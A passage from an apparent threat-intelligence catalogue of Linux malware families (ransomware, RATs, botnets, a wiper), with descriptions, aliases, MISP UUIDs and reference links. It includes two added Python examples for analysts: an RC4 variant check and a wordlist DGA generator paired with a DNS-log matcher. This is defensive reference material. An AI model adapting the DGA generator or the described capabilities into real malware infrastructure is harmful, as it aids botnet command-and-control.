- https://x.com/DarkWebInformer/status/1983679959924383956 - webarchive
- https://www.bleepingcomputer.com/news/security/cloudflare-mitigates-new-record-breaking-222-tbps-ddos-attack/ - webarchive
- https://krebsonsecurity.com/2025/10/ddos-botnet-aisuru-blankets-us-isps-in-record-ddos/ - webarchive
- https://krebsonsecurity.com/2025/11/cloudflare-scrubs-aisuru-botnet-from-top-domains-list/ - webarchive
- https://www.forescout.com/blog/targeting-ot-security-ics-threats-malware/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Akira (ELF)
Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Akira (ELF).
| Known Synonyms |
|---|
| REDBIKE |
Internal MISP references
UUID 365081b9-f60d-4484-befa-d4fc9d0f55d7 which can be used as unique global reference for Akira (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira - webarchive
- https://www.security-chu.com/2025/05/entidades-negociando-con-el-grupo-akira-ransomware.html - webarchive
- https://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/ - webarchive
- https://www.loginsoft.com/post/akira-ransomware-the-evolution-of-a-major-threat - webarchive
- https://zensec.co.uk/blog/unmasking-akira-the-ransomware-tactics-you-cant-afford-to-ignore/ - webarchive
- https://malwareanalysisspace.blogspot.com/2025/03/akira-ransomware-expands-to-linux.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/11/automatic-disruption-of-human-operated-attacks-through-containment-of-compromised-user-accounts/ - webarchive
- https://services.google.com/fh/files/misc/m-trends-2025-en.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html - webarchive
- https://medium.com/@DCSO_CyTec/unransomware-from-zero-to-full-recovery-in-a-blink-8a47dd031df3 - webarchive
- https://arcticwolf.com/resources/blog/arctic-wolf-labs-observes-increased-fog-and-akira-ransomware-activity-linked-to-sonicwall-ssl-vpn/ - webarchive
- https://labs.k7computing.com/index.php/akiras-play-with-linux/ - webarchive
- https://tinyhack.com/2025/03/13/decrypting-encrypted-files-from-akira-ransomware-linux-esxi-variant-2024-using-a-bunch-of-gpus/ - webarchive
- https://research.checkpoint.com/2024/inside-akira-ransomwares-rust-experiment/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AnchorDNS
Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.
Internal MISP references
UUID b88dc3ec-d94c-4e6e-a846-5d07130df550 which can be used as unique global reference for AnchorDNS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns - webarchive
- https://www.netscout.com/blog/asert/dropping-anchor - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/ - webarchive
- https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate - webarchive
- https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30 - webarchive
- https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ANGRYREBEL
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANGRYREBEL.
| Known Synonyms |
|---|
| Ghost RAT |
Internal MISP references
UUID 6cb47609-b03e-43d9-a4c7-8342f1011f3b which can be used as unique global reference for ANGRYREBEL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Auto-Color
According to Unit 42, Auto-Color was discovered in November 2024 and named after the file name of the initial payload. It hides its C2 communication similarly to Symbiote, including the use of proprietary encryption algorithms.
Internal MISP references
UUID 4e3f0985-d3c6-429f-89d6-f2e364cf7350 which can be used as unique global reference for Auto-Color in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AvosLocker
AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.
In March 2022, the FBI and US Treasury Department issued a warning about the attacks.
Internal MISP references
UUID 8cee7a73-df5f-4ca3-ac52-b8a29a9b7414 which can be used as unique global reference for AvosLocker in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker - webarchive
- https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf - webarchive
- https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://unit42.paloaltonetworks.com/emerging-ransomware-groups/ - webarchive
- https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html - webarchive
- https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/ - webarchive
- https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker - webarchive
- https://www.ic3.gov/Media/News/2022/220318.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html - webarchive
- https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group - webarchive
- https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AVrecon
AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVrecon will collect some information about the infected device, open a session to a pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.
Internal MISP references
UUID 1b218432-dd5c-4593-8f37-e202f9418fff which can be used as unique global reference for AVrecon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon - webarchive
- https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/ - webarchive
- https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/ - webarchive
- https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/ - webarchive
- https://twitter.com/BlackLotusLabs/status/1684290046235484160 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
azazel
Azazel is a Linux user-mode rootkit based on a technique from the Jynx rootkit (the LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features.
Internal MISP references
UUID 37374572-3346-4c00-abc9-9f6883c8866e which can be used as unique global reference for azazel in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
B1txor20
B1txor20 is a malware that was discovered by 360 Netlab alongside others exploiting Log4J. The name is derived from the file name "b1t", the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab, this backdoor for the Linux platform uses a DNS tunnel to build a C2 communication channel. They also assumed that the malware is still in development, because of some bugs and not fully implemented features.
Internal MISP references
UUID 05e6d9ff-93a1-429b-b856-794d9ded75df which can be used as unique global reference for B1txor20 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Babuk (ELF)
ESX and NAS modules for Babuk ransomware.
Internal MISP references
UUID 26b4d805-890b-4767-9d9f-a08adeee1c96 which can be used as unique global reference for Babuk (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/ - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings - webarchive
- https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/ - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Backdoorit
According to Avast Decoded, Backdoorit is a multiplatform RAT written in the Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Backdoorit.
| Known Synonyms |
|---|
| backd00rit |
Internal MISP references
UUID 4a4bc444-9e93-47a6-a572-0e13f743d875 which can be used as unique global reference for Backdoorit in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Irc16
Internal MISP references
UUID 3008fa01-492a-42e2-ab9b-a0a9d12823b8 which can be used as unique global reference for Irc16 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BADCALL (ELF)
BADCALL is a Trojan malware variant used by the Lazarus Group.
Internal MISP references
UUID 350817e8-4d70-455e-b1fd-000bed4a4cf4 which can be used as unique global reference for BADCALL (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ballista
Ballista is an IoT botnet, infecting unpatched TP-Link Archer AX21 (AX1800) routers. It spreads through automatic exploitation of CVE-2023-1389. Its capabilities include remote code execution and DDoS attacks.
Internal MISP references
UUID a4364bfb-e440-4a57-9c0f-ad5aa76c3868 which can be used as unique global reference for Ballista in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bashlite
Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bashlite.
| Known Synonyms |
|---|
| Gafgyt |
| gayfgt |
| lizkebab |
| qbot |
| torlus |
Internal MISP references
UUID 81917a93-6a70-4334-afe2-56904c1fafe9 which can be used as unique global reference for Bashlite in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite - webarchive
- https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/ - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora - webarchive
- https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218 - webarchive
- https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt - webarchive
- https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Liu.pdf - webarchive
- https://blog.cyber5w.com/gafgyt-backdoor-analysis - webarchive
- https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ - webarchive
- https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
- https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/ - webarchive
- https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/ - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ - webarchive
- https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ - webarchive
- https://securityscorecard.com/wp-content/uploads/2024/01/Report-A-Detailed-Analysis-Of-The-Gafgyt-Malware-Targeting-IoT-Devices.pdf - webarchive
- https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
- https://www.aquasec.com/blog/gafgyt-malware-variant-exploits-gpu-power-and-cloud-native-environments/ - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BCMPUPnP_Hunter
Internal MISP references
UUID d8dd47a5-85fe-4f07-89dc-00301468d209 which can be used as unique global reference for BCMPUPnP_Hunter in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BianLian (ELF)
Internal MISP references
UUID f6be433e-7ed0-4777-876b-e3e2ba7d5c7f which can be used as unique global reference for BianLian (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian - webarchive
- https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/ - webarchive
- https://www.youtube.com/live/O2Wx7mQHR2I?si=uydJupvHK6sxxw3n - webarchive
- https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BiBi-Linux
According to Security Joes, this wiper is an x64 ELF executable with no obfuscation or protective measures. It takes the target folders as arguments and, if run with root permissions, can render the entire operating system unusable. Execution is very verbose; the output can be suppressed by launching it under "nohup". It uses multiple worker threads fed from a queue to corrupt files concurrently, which increases its speed and reach. It overwrites files, renames them with a random string that contains "BiBi", and skips certain file types.
Internal MISP references
UUID efec7bb0-4ec7-4c97-a8a9-28e0fea19852 which can be used as unique global reference for BiBi-Linux in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bibi_linux - webarchive
- https://www.securityjoes.com/post/mission-data-destruction-a-large-scale-data-wiping-campaign-targeting-israel - webarchive
- https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group - webarchive
- https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Bifrost
Linux version of the Bifrose malware, which originally targeted the Windows platform only. The backdoor can perform file management, start or end a process, or start a remote shell. Its C&C connection is encrypted with a modified RC4 algorithm.
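When a description says "modified RC4", the practical question during analysis is where the variant departs from the standard algorithm. The following is an added example (not Bifrost code and not from any of the references): a reference RC4 with separate key scheduling and keystream generation, plus the check an analyst runs by encrypting a known plaintext with the key pulled from the sample and diffing against the bytes seen on the wire. The key, plaintext and "observed" ciphertext are constructed; the RC4-drop[256] variant that produces the observed bytes is a hypothetical stand-in, because this page does not say what Bifrost actually changes.

```python
def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute S under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(S: list, n: int) -> bytes:
    """PRGA: emit n keystream bytes from a copy of the permutation."""
    S = S[:]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """Stock RC4 (encrypt == decrypt). `drop` discards leading keystream
    bytes (RC4-drop[n]), one of the more common 'modifications' seen in
    malware; drop=0 is the textbook cipher."""
    ks = rc4_keystream(rc4_ksa(key), len(data) + drop)[drop:]
    return bytes(p ^ k for p, k in zip(data, ks))


def first_divergence(a: bytes, b: bytes):
    """Index of the first differing byte, or None if the buffers are identical."""
    for idx, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return idx
    return None if len(a) == len(b) else min(len(a), len(b))


def check_stock_rc4(key: bytes, plaintext: bytes, observed: bytes):
    """Analyst check: encrypt a known plaintext with the key recovered from
    the sample and compare with what the sample actually emitted.
    None means the sample uses stock RC4; an index tells you how far the
    keystreams agree before the modification shows up."""
    return first_divergence(rc4(key, plaintext), observed)


# Constructed analysis scenario (hypothetical key, plaintext and wire bytes).
# The "observed" bytes come from an RC4-drop[256] variant, standing in for
# whatever Bifrost really changes.
SAMPLE_KEY = b"constructed-key"
SAMPLE_PLAINTEXT = b"PING 1.2.3.4 shell-ready"
OBSERVED_ON_WIRE = rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT, drop=256)
```

If the divergence index is 0, suspect the KSA (different initial permutation, key expansion or swap rule); if the keystreams agree for a prefix and then split, look at the PRGA or at a drop count.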
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bifrost.
| Known Synonyms |
|---|
elf.bifrose |
Internal MISP references
UUID 8fa6dd0e-b630-419f-bd01-5271dd8f27c6 which can be used as unique global reference for Bifrost in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost - webarchive
- https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/ - webarchive
- https://twitter.com/strinsert1Na/status/1595553530579890176 - webarchive
- https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/ - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BigViktor
A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.
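A wordlist-based DGA builds domains by concatenating dictionary words selected by a seeded generator, so the bot and anyone who has the wordlist and seed derive the same candidate set for a given day. The block below is an added illustration of that scheme, not BigViktor's algorithm: its wordlist, seed and TLD set are not given on this page, so the ones here are constructed and the SHA-256 counter stream is a hypothetical stand-in for whatever generator the real family uses. It also shows why the usual entropy heuristic for DGA domains does not help against dictionary DGAs.

```python
import hashlib
from collections import Counter
from datetime import datetime, timedelta
from math import log2

# Constructed sample wordlist and TLD set (assumption: a real family embeds a
# much larger list; BigViktor's own list and seed are not given on this page).
WORDLIST = ["blue", "river", "stone", "cloud", "light", "forest", "silver",
            "north", "quick", "ocean", "maple", "winter", "garden", "copper",
            "bright", "valley"]
TLDS = [".com", ".net", ".org"]


def _byte_stream(seed: bytes):
    """Deterministic byte stream from SHA-256 over (seed || counter).
    Hypothetical generator standing in for the hash or LCG a real family uses."""
    counter = 0
    while True:
        block = hashlib.sha256(seed + counter.to_bytes(4, "little")).digest()
        counter += 1
        yield from block


def generate(day: str, count: int = 10, words_per_domain: int = 2) -> list:
    """Candidate C&C domains for one day, `day` given as 'YYYYMMDD'.
    Same day -> same list on the bot and on the analyst's side."""
    stream = _byte_stream(day.encode())
    domains = []
    for _ in range(count):
        words = [WORDLIST[next(stream) % len(WORDLIST)]
                 for _ in range(words_per_domain)]
        domains.append("".join(words) + TLDS[next(stream) % len(TLDS)])
    return domains


def is_candidate(domain: str, day: str, window_days: int = 1) -> bool:
    """Defender side: does a queried domain fall in the generated set for
    `day` plus or minus window_days (bot clock vs. resolver log clock)?"""
    base = datetime.strptime(day, "%Y%m%d")
    for delta in range(-window_days, window_days + 1):
        d = (base + timedelta(days=delta)).strftime("%Y%m%d")
        if domain in generate(d):
            return True
    return False


def shannon_entropy(s: str) -> float:
    """Per-character entropy. Dictionary domains score like legitimate ones,
    which is why this classic DGA heuristic misses wordlist DGAs."""
    n = len(s)
    return -sum(c / n * log2(c / n) for c in Counter(s).values())
```

To block a family like this in practice you regenerate the candidate set for each day from the recovered wordlist and seed and match DNS logs against it (`is_candidate`), rather than scoring domain names by character statistics.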
Internal MISP references
UUID 901ab128-2d23-41d7-a9e7-6a34e281804e which can be used as unique global reference for BigViktor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BioSet
Internal MISP references
UUID 8e301f58-acef-48e7-ad8b-c27d3ed38eed which can be used as unique global reference for BioSet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Black Basta (ELF)
ESXi-encrypting ransomware that uses a combination of the ChaCha20 stream cipher and RSA.
Internal MISP references
UUID 35c86fef-18fe-491c-ad3c-13f98e8f5584 which can be used as unique global reference for Black Basta (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ - webarchive
- https://cyber.levelblue.com/m/356d41d295da03cc/original/WP-LevelBlue-MDRs-Guide-Against-Black-Basta.docx - webarchive
- https://expel.com/blog/code-signing-certificate-abuse-in-the-black-basta-chat-leaks-and-how-to-fight-back/ - webarchive
- https://www.youtube.com/watch?v=bJILHYLX4C4 - webarchive
- https://intel471.com/blog/an-in-depth-look-at-black-bastas-ttps - webarchive
- https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html - webarchive
- https://flare.io/learn/resources/blog/deciphering-black-bastas-infrastructure-from-the-chat-le - webarchive
- https://www.youtube.com/watch?v=cH7BYWbtsfI - webarchive
- https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/A_Deep_Dive_into_the_Leaked_Black_Basta_Chat_Logs.pdf - webarchive
- https://stairwell.com/resources/stairwell-threat-report-black-basta-overview-and-detection-rules/ - webarchive
- https://medium.com/@a-poc/black-basta-leak-analysis-add723b179a5 - webarchive
- https://services.google.com/fh/files/misc/m-trends-2025-en.pdf - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.cloudflare.com/threat-intelligence/research/report/black-bastas-blunder-exploiting-the-gangs-leaked-chats/ - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/pdf/2022-year-in-retrospect-report.pdf - webarchive
- https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview - webarchive
- https://intel471.com/blog/black-basta-exposed-a-look-at-a-cybercrime-data-leak - webarchive
- https://analyst1.com/wp-content/uploads/2025/04/Anastasia-Inside-BlackBasta.pdf - webarchive
- https://www.linkedin.com/pulse/attackers-leveraging-microsoft-teams-defaults-quick-assist-p1u5c - webarchive
- https://www.trellix.com/blogs/research/analysis-of-black-basta-ransomware-chat-leaks/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/ - webarchive
- https://www.esentire.com/blog/initial-takeaways-from-the-black-basta-chat-leaks - webarchive
- https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/ - webarchive
- http://ropgadget.com/posts/blackbasta_leaks.html - webarchive
- https://www.ontinue.com/resource/inside-black-basta-leaked-coversations/ - webarchive
- https://spycloud.com/blog/digesting-messages-from-the-black-basta-chats/ - webarchive
- https://www.lemagit.fr/actualites/366619807/Ransomware-de-REvil-a-Black-Basta-que-sait-on-de-Tramp - webarchive
- https://medium.com/walmartglobaltech/agent-ai-basta-parser-extraordinaire-24edfc59992a - webarchive
- https://www.crowdstrike.com/adversaries/wandering-spider/ - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlackCat (ELF)
ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMware ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.
ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remotely execute itself on other hosts on the local network.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (ELF).
| Known Synonyms |
|---|
ALPHV |
Noberus |
Internal MISP references
UUID 860e9d03-830e-4410-ac89-75b6eb89e7e5 which can be used as unique global reference for BlackCat (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat - webarchive
- https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/ - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis/ - webarchive
- https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/ - webarchive
- https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/ - webarchive
- https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3 - webarchive
- https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive - webarchive
- https://twitter.com/sisoma2/status/1473243875158499330 - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf - webarchive
- https://killingthebear.jorgetesta.tech/actors/alphv - webarchive
- https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
